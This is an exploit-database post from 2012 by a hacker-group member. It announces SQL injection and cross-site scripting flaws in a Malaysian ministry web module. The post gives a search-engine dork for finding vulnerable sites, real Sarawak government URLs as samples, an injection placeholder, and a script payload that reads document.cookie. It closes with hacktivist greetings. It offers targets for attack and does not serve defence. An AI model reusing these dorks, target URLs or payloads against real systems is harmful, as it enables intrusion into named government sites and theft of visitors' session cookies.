[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ministry Malaysia XSS and SQL Injection Vulnerability

Author
phiA
Risk
[
Security Risk High
]
0day-ID
0day-ID-18680
Category
web applications
Date add
17-06-2012
Platform
php
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                   I'm phiA Member From Inj3ct0r TEAM                   1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

- Use it at your risk,,,
- Made In Indonesia 

---------------------------------------------------------------------------!

# Exploit Title: Ministry Malaysia XSS and SQL Injection Vulnerability
# Date: June 15 . 2012
# Author: phiA

---------------------------------------------------------------------------!

#E-mail : phia0343s@hackermail.com
# Category: [webapps] 0day
#Vendor : Ministry Malaysia [owner site]

---------------------------------------------------------------------------!
# Google dork: inurl:/modules/web/page_print.php?id=

#Security risk : Critical
# Tested on: BackTrack 5

---------------------------------------------------------------------------!


#1 Proof OF Concept SQL Injection Vulnerability


a sample from google dork !

http://www.kktpk.sarawak.gov.my/modules/web/page_print.php?id=[sqli]


#2 Proof Of Concept of XSS Vulnerability

a sample from google dork !

http://www.midcom.sarawak.gov.my/modules/web/page.php?id='"<script>alert(document.cookie)</script>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thankz to : Indonesian Grey Hat Team, Jakarta Anonymous Club , BlackNewbie Team , Depe , Arai Maulana , n0Xtra , Vicky_cyber , RadityaHN , X-Cisadane , Sany Morphic , all Indonesian Hackers.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Quote:

-Indonesian people here !

-You should have eXpect us !




#  0day.today [2024-10-06]  #